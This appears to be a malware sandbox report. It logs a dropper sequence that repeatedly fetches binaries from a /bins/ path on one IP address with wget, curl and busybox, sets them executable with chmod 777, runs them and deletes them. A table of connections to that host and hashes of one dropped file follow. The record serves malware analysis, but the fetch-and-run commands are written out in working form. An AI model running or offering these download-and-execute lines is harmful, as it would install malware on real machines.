/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97